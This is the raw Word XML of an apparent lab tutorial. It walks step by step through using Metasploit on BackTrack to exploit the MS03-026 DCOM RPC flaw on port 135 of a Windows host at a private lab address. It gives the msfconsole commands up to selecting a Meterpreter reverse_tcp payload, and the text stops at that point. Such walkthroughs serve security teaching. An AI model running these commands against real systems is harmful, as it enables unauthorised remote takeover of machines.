        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dk6wn7rer6x6" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="2543175"/>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862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jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wsxk5p529oti" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 2: Now on your BackTrack launch msfconsole as shown below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:shd w:fill="222222" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Application &gt; BackTrack &gt; Exploitation Tools &gt; Network Exploit Tools &gt; Metasploit Framework &gt; msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="175260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862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jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kmb7f1i482zh" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 3: Now, we know that port 135 is open so, we search for a related </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPC exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To list out all the exploits supported by Metasploit we use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"show exploits"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. This exploit lists out all the currently available exploits and a small portion of it is shown below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="2257425"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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2862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In msfconsole type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"search dcerpc"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to search all the exploits related to dcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in figure 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="170497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862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o174pgfk82fj" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 4: To get more information regarding the exploit you can use the command,  "info exploit/windows/dcerpc/ms03_026_dcom"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="3457575"/>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86250" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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3"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_w0lxifhm2wyo" w:id="9"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 5: The command "use &lt;exploit_name&gt;" activates the exploit environment for the exploit &lt;exploit_name&gt;. In our case we will use the following command to activate our exploit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"use exploit/windows/dcerpc/ms03_026_dcom"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4286250" cy="542925"/>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286250" cy="542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line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the above figure we can see that, after the use of the exploit command the prompt changes from "msf&gt;" to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"msf exploit(ms03_026_dcom) &gt;"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which symbolizes that we have entered a temporary environment of that exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hb72h6oe8n2w" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 6: We enter the command "set RHOST 192.168.42.129" and we see that the RHOST is set to 192.168.42.129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="1724025"/>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862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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_napnp6k31vsi" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 7: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"show payloads"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command will list all payloads that are compatible with the selected exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4286250" cy="2009775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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286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left"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="white"/>
